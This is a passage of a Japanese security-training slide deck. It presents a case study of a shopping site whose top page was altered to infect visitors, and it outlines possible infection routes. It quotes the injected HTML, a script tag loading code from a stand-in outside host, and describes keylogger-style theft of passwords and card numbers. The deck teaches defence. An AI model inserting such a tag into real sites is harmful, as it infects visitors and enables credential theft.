UNIX 系 OS
2. ウェブサイトに必要な対策 1. トラブルの原因となる脆弱性
1.2 事例:ショッピングサイトでウイルス感染?
S h o p p i n g S i t e
About Search Login
•
ショッピングサイトC
社。•
社員数200
名、Windows
のショッピングカートシス テムを使った中規模ショッピングサイト。会員数10
万人程度。•
リピーターがついており、アクセスは盛況。•
最新パッチの適用、ユーザ管理、アクセス制限と、一通りは対策。
ショッピングサイトの裏側
S h o p p i n g S i t e
About Search Login
•
ショッピングカートシステムを自社開発•
ウェブのコンテンツはDB
に格納されており、アク セスを受けるとショッピングカートシステムが動的 にページを作成する。•
販売担当者はショッピングカートシステムの管理 画面から、自分の担当する商品情報を更新する。•
サーバ群の管理のために、管理者が数名。img
img
img
li li li
ul
お知らせ
div
I
ショッピングサイト上にウイルス
S h o p p i n g S i t e
About Search Login
•
ある日突然C
社に、「ウェブを見たらウイルス対 策ソフトが反応した」「ウェブサイトでウイルスに 感染した」という苦情が複数よせられる。•
ショッピングサイトにはユーザがページ内容を変 更したり、ファイルをアップロードするような機能 はない。•
一体どこから?現在の状態を調査する
•
外部に表示するウェブサイトをメンテナンス用サー バに切り替え、切り離したサイトを調査。•
トップページに、悪意あるスクリプトを読みこませる 内容を追加し、ウイルスに感染させようとしていた。•
他のページには同様の埋めこみは発見できず。トップページに埋めこまれたHTML
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang=“ja”>
<head>
<title>Welcome to “C” shopping site</title>
<link rel="stylesheet" href="style.css" TYPE="text/css">
<script src=“http : //othersite.example.net/3.js”></script>
</head>
外部のスクリプトを読みこんで実行
ウイルスの正体は?
•
幸い、最新のアンチウイルスソフトを使う とウイルスを検知できた。•
感染のために、ウェブブラウザの複数の 脆弱性が使われている。ページを見るだ けで感染する悪質なもの。•
感染すると、マシンに潜み、キーロガー等 の機能でパスワードやカード番号を盗み だす。•
アクセスログを見ると、数千人がダウン ロードしてしまった可能性がある。参考: 最近のウイルスの動作
•
罠ウェブ経由/
普通のウェブ経由で感染•
ブラウザやプラグインの複数の脆弱性をついて侵入を試み る•
最初は小さくて流用しやすいプログラム(
ダウンローダ)
に感 染させる•
実際の攻撃は別サイトからダウンロードしたコード(
プログラ ムそのもの)
が行う•
何がダウンロードされるかわからない=
対策パッチをあてて も、そのパッチを掻い潜る次の攻撃手法が使われる•
ダウンロードや命令には、会社が制限できない内部→
外部の
HTTP/HTTPS
を利用し、正規の通信に見せかける。参考
:
近年の標的型攻撃に関する調査研究http://www.ipa.go.jp/security/fy19/reports/sequential/index.html
まずは感染経路を特定する
どうやってウェブサイトにウイルスが仕組まれたのか?
詳細な調査が必要
•想定 1:
サーバへの攻撃?
サーバに侵入され改ざん
•想定 2:
内部犯行?
•
想定3:
ウェブサイト経由?
ショッピングカートシステムの脆弱性
想定1: サーバへの攻撃?
外部からの攻撃による改ざんを疑う。
•
外部に公開しているのはウェブ用とメール用のサーバのみ。
DB
は非公開。•
外部からはアクセス制限により、メー ル(port 25)
と、ウェブ(port 80/443)
し かアクセスできない。•
ソフトウェアは随時アップデートしてお り、既知の脆弱性の問題はない。•
攻撃されたとすれば未知の脆弱性。他をまず調査するべき。
ウェブ